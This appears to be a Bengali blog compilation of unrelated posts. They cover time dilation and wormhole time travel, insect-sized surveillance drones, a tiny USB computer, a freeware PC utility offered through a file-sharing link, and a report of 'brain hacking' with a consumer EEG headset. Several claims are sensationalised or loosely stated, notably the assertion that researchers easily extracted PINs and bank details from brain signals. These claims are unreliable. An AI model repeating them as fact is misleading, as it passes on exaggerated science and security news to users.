এসব ভদ্র কথা কিছু কাজে মেলে না। উদাহরন দেই, টাইম ডাইলেশনের সাথে আমরা হয়তো অনেকেই পরিচিত হয়ে থাকবো। দু জমজ ভাই রাম আর সাম। সাম দেখা গেলো নাসায় চাকরি পেলো এবং কিছুদিনের মধ্যে ওকে একটা ফাটাফাটি স্পেসশীপে উঠিয়ে দিয়ে পাঠিয়ে দেয়া হলো কাছাকাছি কোনো নক্ষত্রে। তার স্পেসশীপ কল্পনাতীত গতিতে চলা শুরু করলো মাধ্যাকর্ষন বলের অভাবের সুযোগে, একটা ঘুরনি দিলো তারাটাকে তারপর পৃথিবীতে ফিরে আসলো যেখানে রাম বাসায় পরে পরে পরিবারের প্রতি দায়িত্ব পালন করছিলো। সামের জন্য ধরা যাক তার মোট পরিভ্রমন করতে লেগে গেছে 1 বছর কিন্তু পৃথিবীতে ইতিমধ্যে 10 বছর কেটে গেছে। সেক্ষেত্রে রাম ভাইজান তার থেকে 9 বছরের বড় ভাই হয়ে গেছে। আসলে সাম 1 বছর পর পৃথিবীতে এসে 9 বছর পরের পৃথিবী দেখছে, তারমানে সে অলরেডী ছোটখাটো একটা টাইম ট্রাভেল করে এসেছে।
কিছু বাস্তব উদাহরন: আমাদের অনুভবের বাইরে- একটু JET LEG
তবে বাস্তবে আমরা কিন্তু অহরহই এরকম পরিস্হিতির স্বীকার হচ্ছি।যদি আমরা এ্যায়ারক্রাফটের গতিতে চলি তাহলে ব্যাপারটা এত ভালোভাবে ধরতে পারি না এ জন্য যে তখন টাইম ডাইলেশনের পরিমান থাকে কয়েক ন্যানসেকেন্ডের মতো। কিন্তু এটা যদি এ্যাটোমিক ঘড়ির দ্বারা আরো নির্ভুল ভাবে মাপতে যাই তখন দেখা যাবে সময়কে গতি দ্বারা একটু টেনে ধরা হয়েছে বা সময়টা টান খেয়ে লম্বা হয়েছে একটু! তাহলে এঘটনা থেকে বোঝা যায় নিকট ভবিষ্যতে আমরা অহরহই টাইম ট্রাভেল করছি যেটা আমাদের অনুভূতির বাইরে। ইন্টারনেট ঘাটলে এরকম হাজারো পরীক্ষার কথা জানা যাবে।
সময়ের এই চ্যাপ্টা খাওয়া গন্ডগোলটা আরেকটু যদি অবজার্ভ করতে যাই তাহলে সাবএ্যাটমিক লেভেলে চিন্তা করা যেতে পারে যেগুলো ঘুরতে থাকে আলোর খুব কাছাকাছি গতিতেই (এখানে লার্জ হেড্রন কোলাইডারের ব্যাপারে কিছু বলা যেতে পারেATLAS in LHC)। এসব কণাগুলোর মধ্যে একটা কণা হচ্ছে মিউন। বেশ স্বাতন্ত্র প্রকৃতির কণা কারন এটা মূলত বিল্ট ইন ঘড়ির মতো কাজ করে কারন এর ক্ষয়টা হয় নির্দিস্ট হাফ লাইফে (1.52 মাইক্রোসেকেন্ডস এবং এটার ক্ষয় হবার পর muon = electron + electron antineutrino + muon neutrino)।তা এই মিউন আবার কোলাইডারের ভিতর প্রচন্ড গতিপ্রাপ্ত হয় তখন আইনস্টাইনের সূত্রানূসারে এর ক্ষয় হবার হার কমে যায়। কিছু কসমিক রে এর ক্ষেত্রে সময়ের এই অসমন্জ্ঞস্যতা দেখা যায়। এই রে এর পার্টিক্যাল গুলো আলোর গতির কাছাকাছি চলে বিধায়, তাদের দৃস্টিকোণ থেকে তারা একটা গ্যালাক্সীকে কয়েক মিনিটে পার করলো, যদিও পৃথিবীর সাপেক্ষে মনে হলো যে তারা কিছু 10 হাজারেরও বেশী সময় ধরে পার করলো (এইটাও আইনস্টাইনের আর লরেন্জের কন্ট্রাকশনের সূত্রানূসারে)। যদি টাইম ডাইলেশন না থাকতো তাহলে এইসব পার্টিক্যাল কখনোই পৃথিবী ছুতে পারতো না।
আইনস্টাইনের কিছু কথা
আইনস্টাইনের রিলেটিভিটি নিয়ে আবারো একটু কথা বলি: এই সূত্রানুসারে আইনস্টাইন নামের কেরানী বলেছিলেন গ্রাভীটি সময়কে ধীর করে ফেলে।অর্থাৎ ঘড়িটা 10 তলায় একটু দ্রূত চলে গ্রাউন্ড ফ্লোর থেকে (?) যেটা পৃথিবীর কেন্দ্রের একটু কাছাকাছি বলে গ্রাভীট্যাশনাল শক্তির আরেকটু কাছাকাছি। তবে এটা আপনে আমি কখনোই অনুভব করতে পারবো না, পারবে কোনো এ্যাটমিক বা সিসমিক ঘড়ি (দুঃখের বিষয় হলো আমি কখনোই এসব ঘড়ি দেখি নাই, ইদানিং মোবাইলের কারনে আমি ঘড়িও পড়ি না)। তবে একটা জিনিস আমরা বুঝতে পারি যারা জিপিএস অহরহ ব্যাবহার করেন। যদি তাই বা না হতো নাবিকেরা, ক্রুজ মিসাইল আরো কয়েক মাইল দূরে গিয়ে পৌছুতো নির্দিস্ট জায়গা থেকে।
আরেকটা জটিল উদাহরন দেই: নিউট্রন তারা ঘনত্ব সম্পর্কে ধরা যঅ সবারই আইডিয়া আছে এবং এর গ্রাভীটি সম্পর্কেও সেক্ষেত্রে জানার কথা(এ ব্যাপারে বিস্তারিত জানানো যাবে অন্য কোনো পোস্টে যদি বা কোনো কৌতুহল থাকে)। হিসাবে দেখা যায়, সময় ওখানে 30% শতাংশ ধীর পৃথিবীর সময় থেকে। যদি ঐ তারা থেকে কেউ যদি টেলিস্কোপ দিয়ে পৃথিবীতে উকি মারে তাহলে দেখা যাবে সবাই ভিডিও ক্যাসেটের ফাস্ট ফরওয়ার্ডের মতো দৌড়াচ্ছে। ব্লাক হোলও সেরকম একটা জিনিস যদি সিঙ্গুলারিটিতে কেউ পড়তে পারে তাহলে তার জন্য একটা আদর্শ টাইম ডাইলেশন সম্পর্কে ক্লীয়ার ধারনা পেতে পারে।
অন্যান্যদের মনের কথা: অতীত যাওয়াও সম্ভব!
1948 সালে কার্ট গোডেল আইনস্টাইনের গ্রাভিটেশনাল ইকোয়েশন সমাধান করে দেখালেন যে আসলে এটা একটা ঘুর্নায়মান মহাবিশ্বকে রিপ্রেজেন্ট করছে (যদিও এটা সে কিভাবে বোঝালো সেটা আমার পক্ষে বের করা সম্ভব হয়নি, তবে এটা নির্ভুল হলে একটা দারুন খোজ ছিল)। এই তত্ব অনুসারে একজন নভোচারী পরিভ্রমন করে তার অতীতে ফিরে যেতে পারবে। এটা এজন্য যে গ্রাভীটি যেভাবে আলোর গতিকে প্রভাবিত করবে।তবে এই সলিউশনের অনেক ভেজাল ছিলো, প্রথমত এই তত্ব অনুসারে তাহলেতো বিগ ব্যাং আর সিঙ্গুলারিটি মার খেয়ে যায়।
আরেকটা সিনারিও পাওয়া যায় যেটা 1974 সালে তুলান ইউনিভার্সিটির ফ্রান্ক টিপলার অন্ক কষে বের করেন যে একটা ঢাউস সাইজের অসীম দৈর্ঘের সিলিন্ডার আলোর গতিতে ঘুরছে তার নিজস্ব অক্ষে এবং সে ক্ষেত্রে একজন নভোচারী তার অতীতে ফিরে যেতে পারে এর মাধ্যমে কারন সেই একই ঘটনা: এখানে আলোকে টেনে পেচিয়ে একটা বদ্ধ লুপের মধ্যে এনে ফেলেছে। আবারো 1991 সালে রিচার্ড গট নামের একজন ভবিষ্যৎবানী করেন যে কসমিক স্ট্রিং একই ফলাফলের জন্ম দিতে পারে (কসমোলজিস্টরা সন্দেহ করেন যে এটার গঠিত হয়েছিলো বিগ ব্যাংর এর প্রাথমিক পর্যায়ে)।কিন্তু আশির দশকের মাঝামাঝি ওয়ার্মহোলের কনসেপ্ট নতুন মাত্রা আনে।Time travel concept through wormhole
ওয়ার্মহোল একটা হাইপো যার আরেক নাম স্টারগেট এবং এটা হচ্ছে দীর্ঘতম দূরত্বে অবস্হিত দুইটা বিন্দুর মধ্যবর্তি একটা শটকাট রাস্তা। কেউ যদি ওয়ার্মহোল দিয়ে একটা লাফ দেয় তাহলে সে হয়তো নিজেকে মহাবিশ্বের অন্য প্রান্তে খুজে পেতে পারে। ওয়ার্মহোল জেনারেল থিওরী অফ রিলেটিভিটিতে খাপ খায় যেখানে গ্রাভীটি শুধু সময়কে নয় স্হান কেও লন্ডভন্ড বা মুচড়ে ফেলতে পারে।এই থিওরী একটা অল্টারনেটিভ রাস্তা এবং টানেলের ধারনা দেয় যেটা মূলত স্হানের ঐ দুই বিন্দুর সংযোগ হিসেবে কাজ করে। একটা ওয়ার্মহোল হতে পারে আসল রাস্তার চেয়ে কম দূরত্বের হতে পারে!
Wormhole
এখন ধরে নেয়া যাক ওয়ার্মহোলের ভিতর দিয়ে পরিভ্রমন করা যায় (এখানে একটা মেইন ব্যাপার হলো যদি আমি ঘুরতে যাই, হয়তো আমি টেনে এমন লম্বা হবো যে আমার 5.8 ফুটি দেহ 30 ফুটি হয়ে যাব আর আমার প্রাণ বায়ুর যে কি হবে সেটা বুঝতে পারছি না কারন ঐ সময় আমার কোনো গ্রোথ বা অনুভূতিও থাকবে না), এর মধ্যে অবশ্য থর্নের ইক্সোটিক ম্যাটারের অস্তিত্ব থাকতে থাকবে।কোয়ান্টাম ম্যাকানিক্স অনুসারে এ্যাক্সোটিক ম্যাটার নেগেটিভ ভর সম্পন্ন এবং গ্রাভীটিতে এটা আকর্ষনের পরিবর্তে বিকর্ষিত হয়। আর একটা ওয়ার্মহোলের স্ট্যাবিলিটির জন্য এটার উপস্হিতি প্রয়োজন কেননা এটার মাধ্যমে একটা এ্যান্টিগ্রাভীটি ফোর্স কাজ করবে এবং বিস্ফোরন রোধ করবে যেটা তখন একে ব্লাক হোলে পরিণত করবে। এই এ্যাক্সোটিক ম্যাটার আমাদের চেনা জানা ফিজিক্সের দিয়ে ব্যাখ্যা করা যায় না (এজন্যই এটা হাইপো!) তবে এই নেগেটিভ এ্যানর্জি স্টেটের অস্তিত্ব কিছু নির্দিস্ট কোয়ান্টাম সিস্টেমেই থাকে তবে এটা এখনো অপরিস্কার যে কি পরিমান এ্যান্টিগ্রাভিটি কণার প্রয়োজন একটা ওয়ার্মহোলকে স্ট্যাবিলাইজ করতে!
তবে থর্ন আর তার কলিগরা পরে বুঝতে পারেন যে যদি একটা স্ট্যাবল ওয়ার্মহোল যদি তৈরী করা যায়, তাহলে এটা একটা টাইম মেশিন হিসেবে কাজ করতে পারে।
স্ট্যাবিলাইজড ওয়ার্মহোল: টাইম মেশিনের দ্বারপ্রান্তে
তাহলে একটা ওয়ার্মহোল যদি আমরা পেতে চাই, তাহলে এর একটা মুখ একটা নিউট্রন তারার দিকে টানা থাকবে এবং অবস্হানটা থাকবে এর সারফেস এর দিকে। তারা মাধ্যাকর্ষন ঐ স্হানের সময়কে ধীর করে ফেলবে যাতে করে ওয়ার্মহোলের দু মুখের মধ্যে একটা সময়ের ব্যাবধান আস্তে আস্তে বাড়তে থাকে। যদি দুটো মুখই জায়গা মতো রাখা হয়, এই সময়ের ব্যাবধানটাই ওখানে আটকে থাকবে!Wormhole path
ধরা যাক ঐ সময়ের ব্যাবধান 10 বছর। একজন নভোচারী ঐ ওয়ার্মহোলের মধ্য দিয়ে এক দিকে লাফ দিলো যেটা মূলত 10 বছর পরের ভবিষ্যত আবার আরেক নভোচারী যদি আরেক দিক দিয়ে লাফ দেয় তাহলে পৌছে যাবে 10 বছর পিছনে।তাহলে দেখা যাচ্ছে স্হানাংকের একটা ক্লোজ লুপ একই ভাবে একটা সময়াংকের লুপে পরিণত হতে পারে। শুধু একটা রেস্ট্রিকশন তখন থাকবে যখন ওয়ার্মহোল প্রথম তৈরী করা হয়েছিলো সে সময়ে ঐ নভোচারী কখনোই ফিরত পারবেনা।
অন্যভাবে বলা যায়, ওয়ার্মহোল প্রাকৃতিক ভাবে তৈরী হতে পারে খুবই ক্ষুদ্র স্কেলে, যেমন প্লান্ক লেন্হে যার তুলনা হতে পারে একটা আনবিক নিউক্লিয়াসের। তত্ব অনুসারে, এরকম এক মিনিটের ওয়ার্মহোল এ্যানর্জি পালসের দ্বারা স্ট্যাবল হয় অতঃপর কোনোভাবে সাধারন মাত্রায় বিরাজ করে!
প্যারাডক্স
এখন কিছু প্যারাডক্সের কথা বলা যাক, যেটা মূলত সবচেয়ে বর প্রশ্ন এইসব টাইম মেশিন থিওরেটিস্টদের কাছে!ধরা যাক এসব ইন্জ্ঞনিয়ারিং প্রবলেম মেটানোর পর আমরা একটা টাইম মেশিন বানাতে সক্ষম হলাম, তাহলে দেখা গেলো এক বদ লোক অতীতে গিয়ে তার মেয়েকে ছোটবেলাতেই খুন করলো, সেক্ষেত্রে কি হবে?
এরকম অনেক ধাধা বা প্রশ্ন সামনে আসবে যখন কেউ হয়তো অতীত পরিবর্তন করতে চাইবে তবে হ্যা এটা যদি এমন হয় একজন অতীতে গিয়ে একটা মেয়েকে বাচালো আর ভবিষ্যতে সে তার মা হলো তখন এটা একটা কারনঘটিত পজিটিভ লুপ হবে যেটার সামন্জ্ঞস্যতা বিদ্যমান। হয়তো কোনো টাইম ট্রাভেলারের আচরনগত ক্ষমতাকে রেস্ট্রিক্ট করা যেটে পারে এসব কারনগত সামন্জ্ঞস্য দিয়ে, কিন্তু এটা আসলেই সম্ভব হবেনা টাইম ট্রাভেলারের ফ্রিকোয়েন্সি কন্ট্রোক করা।
আবার এমনও হতে পারে যে ধরা যাক, একজন টাইম ট্রাভেলার এক বছর আগে গিয়ে কোনো ফাটাফাটি থিওরেম IEEE থেকে ডিটেলসে পড়ে আবার অতীতে গিয়ে সেটা সে তার ছাত্রদের ভালো পড়িয়ে ফেললো যেটা পড়ে আবারো IEEE তে লেখা হলো। তাহলে দুটো লেখা দু সময়ে।
এই সব টাইম ট্রাভেলের অদ্ভুত ঘটনা এখনো একে সম্ভাবনার খাতায় ফেলে রেখেছে। তবে স্টিফেন হকিং “ক্রোনোলজি প্রোটেকশন কনজেকচার” এর ধারনা দেন যেটা এই কারনগত লুপ গুলোকে বাদ দিয়ে ফেলে। অবশ্য পেনরোজের এরকম একটা কনজেকচার আছে।যাই হোউক রেলিটেভিটির ল কারনগত লুপকে সমর্থন করে, এবং এই ক্রোনোলজি কনজেকচারের মাধ্যমে কিছু ফেক্টরের প্রয়োজন পরে যেগুলো টাইম ট্রাভেলারের অতীত ভ্রমনের বিষয়টি নিয়ে কাজ করতে পারে। তাহলে এই ফ্যাক্টরগুলো কি? একটা সাজেশন হলো কোয়ান্টাম প্রক্রিয়া সেক্ষেত্রে এগিয়ে আসবে।টাইম মেশিনের অস্তিত্ব কনাগুলোকে তাদের লুপ থেকে অতীতে ভ্রমন করার পারমিশন দেবে। কিছু ক্যালকুলেশনে অবশ্য এমন ইঙ্গিত পাওয়া যায় যে আগের ঘটে যাওয়া অঘটনসমূহ নিজে থেকেই জোরেশোরে উঠে এসে শক্তির বিশাল এক সার্জের সৃস্টি করে ওয়ার্মহোলকে ভেঙ্গে ফেলবে!
এই ক্রোনোলজিক্যাল প্রোটেকশন এখনো ধারনাগত পর্যায়ে, তাই টাইম ট্রাভেল নিয়ে এখনো আশার আলো আছে। হয়তো অপেক্ষা করতে হবে সেই ক্ষনের জন্য যখন কোয়ান্টাম ম্যাকানিক্স সক্ষম হবে গ্রাভিটেশনাল হাইপোথিসিস গুলোর সাথে হয়তোবা এমন একটা থিওরীর মাধ্যমে যার মাধ্যমে সমন্বয় ঘটবে স্ট্রিং থিওরি বা তার এক্সটেনশনের জন্য, তৈরি করবে তথাকথিত M-থিওরী। এটা এমনও হতে নেক্সট জেনারশনের কোলাইডারগুলো এরকম ছোটখাটো সাব এ্যাটোমিক ওয়ার্মহোলের সৃস্টি করতে পারবে যেটা হয়তো এইচজি ওয়েলসের টাইম মেশিনের কাছে শিশু মাত্র!। কিন্তু এটা অবশ্যই পদার্থবিদ্যায় এক অনবদ্য পরিবর্তন আনবে!

পতঙ্গ আকৃতির ড্রোন

আমেরিকা অতি ক্ষুদ্র ড্রোন তৈরির গবেষণায় ব্যাপক অর্থ বিনিয়োগ করেছে। এসব ড্রোন আকারে মশা-মাছির চেয়ে বড় না হলেও এতে বসানো থাকবে ক্যামেরা ও মাইক্রোফোন। এ ছাড়া, প্রয়োজনে এসব মশা-মাছি আকৃতির ড্রোন দিয়ে সন্দেহভাজন ব্যক্তির দেহ থেকে ডিএনএ নমুনা সংগ্রহ করা থেকে শুরু করে শক্রকে বিষ পর্যন্ত প্রয়োগ করা যাবে।

ইন্টারনেটে প্রকাশিত বিভিন্ন সূত্র থেকে পাওয়া খবরের ভিত্তিতে জানা গেছে, এ ধরনের ড্রোন তৈরির গবেষণা করছে জন হপকিন্স বিশ্ববিদ্যালয়ের একটি গবেষক দল। এ দলকে সহযোগিতা করছে ভার্জিনিয়ার আলিংটনে অবস্থিত রাইট-প্যাটারসন বিমান ঘাঁটির ‘ইউএস অফিস অব দ্যা সায়েনটেফিক রিসার্চ’। এ গবেষকরা ‘মাইক্রো অ্যারিয়েল ভেহিকেল’ বা এমএভি নামের কীট পতঙ্গ আকারের ড্রোন তৈরির কাজ করছে। এ ধরনের ড্রোন ব্যবহার করে অনায়াসে নানা গোয়েন্দা অভিযান চালানো যাবে।
এসব কৃত্রিম পতঙ্গের দল বা ড্রোন অনায়াসে যে কোন শহর বা নগরে ঢুকে পড়তে পারবে। শহর বা নগরে দালান-কোঠা ও মানুষের ভিড় রয়েছে। সেইসঙ্গে বাতাসের গতিও কখন কি রকম হবে তা আগে ভাগে সব সময় অনুমান করা যায় না। ফলে প্রচলিত ড্রোন দিয়ে এসব এলাকায় গোয়েন্দা ততপরতা চালিয়ে সব সময় কাঙ্ক্ষিত ফল পাওয়া যায় না।
কিন্তু চলতি গবেষণার ক্ষেত্রে এ রকম কীট-পতঙ্গ আকারের ড্রোন দিয়ে অনেক কাজ করা যাবে। বলা যায়, বিজ্ঞান-কল্পতে যেসব কথা বলা হয় তার অনেকাংশ সফল হবে এসব ড্রোনের মাধ্যমে। এসব ড্রোন দূর নিয়ন্ত্রিত হবে। মশা বা মাছির মতো অনায়াসে এসব ড্রোন সন্দেহভাজন ব্যক্তির দেহে এসে বসতে পারবে। তারপর অতিসূক্ষ্ম সুঁই ফুটিয়ে ব্যক্তিটির দেহ থেকে ডিএনএ নমূনা সংগ্রহ করে দ্রুত বেগে উড়ে সরে পড়বে। সংশ্লিষ্ট ব্যক্তিটি এক্ষেত্রে মশার কামড়ের চেয়ে বেশি ব্যথা পাবে না। তবে মশায় কামড়ালে যে রকম জ্বালা হয় তা অবশ্য হবে না। কিন্তু জায়গাটা ফুলে উঠবে।
এসব ড্রোন কেবল ডিএনএ নমুনাই সংগ্রহ করবেনা সেইসঙ্গে সন্দেহভাজন ব্যক্তির দেহে অতিক্ষুদ্র আকারের রেডিও ফ্রিকোয়েন্সি আইডেনটিফিকেশন বা আরএফআইডি বসিয়ে দিয়ে আসবে। ফলে দূর থেকে সন্দেহভাজন ব্যক্তির চলাফেরার ওপর নজর রাখা যাবে। কিংবা এ ড্রোন দিয়ে বিষও প্রয়োগ করা যাবে শত্রুপক্ষের লোকজনকে।
অবশ্য শুধু আমেরিকাই নয় সেইসঙ্গে ইসরাইল,ফ্রান্স ও নেদারল্যাণ্ড একই ধরনের ড্রোন তৈরি করছে। এ কাজে অনেক এগিয়ে গেছে ইসরাইল। প্রজাপতি আকারের ড্রোন তৈরি করেছে অবৈধ এ দেশটি। এক বিশেষ ধরনের হেলমেট পরে এ ড্রোন নিয়ন্ত্রণ করতে হবে এবং এ হেলমেট মাথায় দিলে প্রজাপতি-ড্রোন যা দেখবে তার সবই দেখতে পাবেন হেলমেটধারী ব্যক্তি

পৃথিবীর সবচেয়ে ক্ষুদ্রতম কম্পিউটার!

হয়ত বলবেন পৃথিবীর বর্তমানে সবচেয়ে বড় কম্পিউটারের কথা জানি। কিন্তু বর্তমানে পৃথিবীর সবথেকে ক্ষুদ্রতম কম্পিউটারের সাথে পরিচয় আছে কি?
সম্প্রতি নরওয়ের গবেষকরা মাত্র ২১ গ্রাম ওজনের একটি কম্পিউটার তৈরী করেছেন। USB আকারের এ কম্পিউটারটির নাম দেয়া হয়েছে ‘কটন ক্যান্ডি’, খবর Gigmag-এর।
নির্মাতা প্রতিষ্ঠানের দাবী, ইউএসবি ‘কটন ক্যান্ডি’ হচ্ছে পৃথিবীর ক্ষুদ্রতম কম্পিউটারগুলোর অন্যতম। এ ইউএসবি ডিভাইসটি কম্পিউটার, ল্যাপটপ, ট্যাবলেট এবং স্মার্টফোন কম্পিউটিং সুবিধা যোগ করতে পারে। টার্মিনাল সংযোগ হিসেবে বিভিন্ন ডিভাইসে ইউএসবি’র অপারেটিং সিস্টেম, ক্লাউড সার্ভিস এবং বিভিন্ন অ্যাপ্লিকেশনও চালু করবে। এ ছাড়াও এটি টেলিভিশন, সেট টপ বক্স এবং গেম কনসোল হিসেবেও ব্যবহার করা যাবে। ‘কটন ক্যান্ডি’ ডিভাইসটি তৈরী করেছে নরওয়ের FXI টেকনোলজিস।
FXI টেকনোলজিস-এর সিইও বোর্গার লোসল্যান্ড জানিয়েছেন, ‘আমরা বিশাল প্রযুক্তিকে ক্ষুদ্র ডিভাইসে নামিয়ে এনেছে।’ Koton Candy ফিচার হিসেবে রয়েছে, গুগলের অ্যান্ড্রয়েড অপারেটিং সিস্টেম, ১.২ গিগাহার্টজ কোয়াড কোর এরআএম মালি গ্রাফিক্স সেট, ওয়াই-ফাই,Blue tooth এবং HDMI output হাই ডেফিনিশেন ভিডিও দেখা যাবে এ কম্পিউটারে।
আগামী বছরের মাঝামাঝি এ ডিভাইসটি বাজারে চলে আসবে বলে সবার ধারনা। এটির দাম পড়বে প্রায় $২০০ এর মত। সূত্রঃ ইন্টারনেট।

পিসি খবরদারী বা নজরদারি–১ কিলোবাইটও আপনার চোখ এড়াতে পারবে না

আমরা অনেক Utility সফটওয়্যার ব্যবহার করেছি । Utility সফট সবই উপকারী । তবে সব গুলো কার্যকারী নয় । কিন্তু আমি এখন যে সফট টি শেয়ার করব এটা খুব…… কার্যকারী ।
এই সফট টি আপনার পিসি কে সত্যিকার ভাবেই clean রাখবে । আপনার Junk ফাইল গুলো খুজে বের করবে আর Fight করবে । সাথে রয়েছে Powerful Privacy Cleaner. এতে রয়েছে Quick care নামের একটি অপশন । যা আপনার পিসি ডাক্তার হিসেবেই কাজ করতে সক্ষম । এছাড়াও রয়েছে system booster যা আপনার পিসি এর গতি বাড়াবে ।
এত সময় যা যা আলোচনা করলাম, এগুলো আসলে আমার আলোচনার বিষয় নয় । তাহলে মূল কথায় আসি ।
এই সফটটার সাথে রয়েছে অসাধারণ একটি Traffic Monitor । অর্থাৎ এটি আপনার Internet এর সম্পূর্ণ এবং পাই টু পাই খবর রাখবে । আপনি কতটুকু নেট খরচ করেছেন শুধু তাই নয় । কোন সফট কতটুকু নেট ব্যবহার করেছে, করছে তাও আপনি জানতে পারবেন ।
আপনি ইচ্ছা করলে যে কোন সফট এর নেট ব্যবহার FIXED করেও দিতে পারেন । ইন্টারনেট এখন থাকবে আপনার হাতের মুঠ এ । ১ কেবি ও আপনাকে ফাঁকি দিতে পারবে না । আপলোড – ডাউনলোড সব ই আপনি দেকতে পারবেন ।
আমি আগে নেট ব্যবহার নিয়ন্ত্রন এ রাখার জন্য অন্য সফট ব্যবহার করেছি, কিন্তু এটার চাইতে Powerful সফট আমি দেখি নাই । তাসারা অন্য সফট গুলোতে Registration এর ঝামেলা থাকে । কিন্তু এটি ১০০% Freeware ।
এটি সবসময় আপনার নেট স্পীড আর পিসি Performance স্ক্রীন এ দেখাবে ।
লিমিটেড কিংবা আন-লিমিটেড ইউজার, সবার জন্যই এই Traffic Monitor টি খুব ই উপকারী হবে বলে আশা করি ।
মূল সফট টা ডাউনলোড করে Traffic Monitor এ ক্লিক করে Traffic Monitor ইন্সটল করে নিবেন ।
pc-towfiq.jpgpc-towfiq.jpgpc-towfiq.jpg
মাত্র ৫ মেগা এর সফট টা এখান থেকে ডাউনলোড করুন- http://www.mediafire.com/?955k6z9rdnebg7r

সর্বোচ্চ প্রযুক্তির বাহাদুরি, এবার মস্তিস্ক থেকে তথ্য চুরি !!! (তথ্য চুরি করতে মানব ব্রেইন হ্যাকিং

ইন্টারনেট এ বিভিন্ন সাইট থেকে তথ্য চুরির ঘটনা আমরা অনেক শুনেছি, কিন্তু মস্তিস্ক থেকে তথ্য চুরির ঘটনা বিশ্বে এবারই প্রথম।  সার্ভার এর গুরুত্বপূর্ণ তথ্য, সাইট এর কন্টেন্ট, বেঙ্ক এর গোপন তথ্য, পিন নাম্বার, একাউন্ট আইডি ইত্যাদি সুরক্ষিত রাখার জন্য  নিরাপত্তা জাল তৈরির কমতি থাকেনা কোনোক্ষেত্রেই । তবুও হেকিং এর ঘটনা প্রতিনিয়ত ঘটছেই ।  তথ্য সুরক্ষিত রাখার জন্য সর্বোচ্চ নিরাপত্তা বেবস্থা  জোরদার করার পরও যদি তথ্য চুরি হয়, তবে বিষয়টি অবাক হবার মতই ।  কিন্তু না,  অবিশ্বাস্য মনে হলে বিষয়টি সত্যি ।   এখন মানব মস্তিষ্কও  হ্যাক করা সম্ভব !  শুধু তাই নয়, যে কোনো ব্যক্তির ব্রেইন হ্যাক করে  তার ব্যক্তিগত গোপন সব তথ্য চুরি করা সম্ভব ।  মানুষের মস্তিষ্ক হ্যাক করে গোপন তথ্য চুরি করা যে সম্ভব, সম্প্রতি তার প্রমাণ দিয়েছে ইউনিভার্সিটি অফ অক্সফোর্ড এবং ইউনিভার্সিটি অফ ক্যালিফোর্নিয়ার বিজ্ঞানী ও গবেষকরা । আর এ কাজে  বিজ্ঞানী ও গবেষকরা ব্যবহার করেছেন স্বল্পমূল্যের ইমোটিভ ব্রেইন কম্পিউটার ইন্টারফেস বা ইমোটিভ বিসিআই।

বিজ্ঞানীদের গবেষণায় সহযোগিতা করেন একাধিক স্বেচ্ছাসেবক এবং ওই স্বেচ্ছাসেবকদের কয়েকজনকে ইমোটিভ বিসিআই হেডসেট পরিয়ে কম্পিউটারের সামনে বসিয়ে দেন বিজ্ঞানীরা।  এরপর মস্তিষ্কের পি৩০০ সিগন্যাল অনুসরণ করে সংগ্রহ করেন স্বেচ্ছাসেবকদের বিভিন্ন ব্যক্তিগত গোপন সকল  তথ্য ।
ইমোটিভ বিসিআই ব্যবহার করে স্বেচ্ছাসেবকদের মস্তিষ্ক থেকে সংগ্রহ করা ডেটা থেকে খুব সহজেই তাদের ঠিকানা, ব্যাংক অ্যাকাউন্ট এবং কার্ড পিন নম্বর খুঁজে বের করে ফেলেন  বিজ্ঞানী ও গবেষকরা।
বিজ্ঞানী ও গবেষকরা  আশংকা করছেন এই প্রযুক্তি ব্যবহার করে আগামীতে গুরুত্বপূর্ণ ব্যক্তিদের ওপর হ্যাকিং চালাতে পারে নানা অশুভ শক্তি ।  সর্বোচ্চ প্রযুক্তির  মাধ্যমে  মস্তিষ্ক থেকে তথ্য চুরির এ অসাধারণ কাজটি এখন পর্যন্ত পৃথিবীর ইতিহাসে একটি বিরল ঘটনা এবং নজিরবিহীন মাইলফলক ।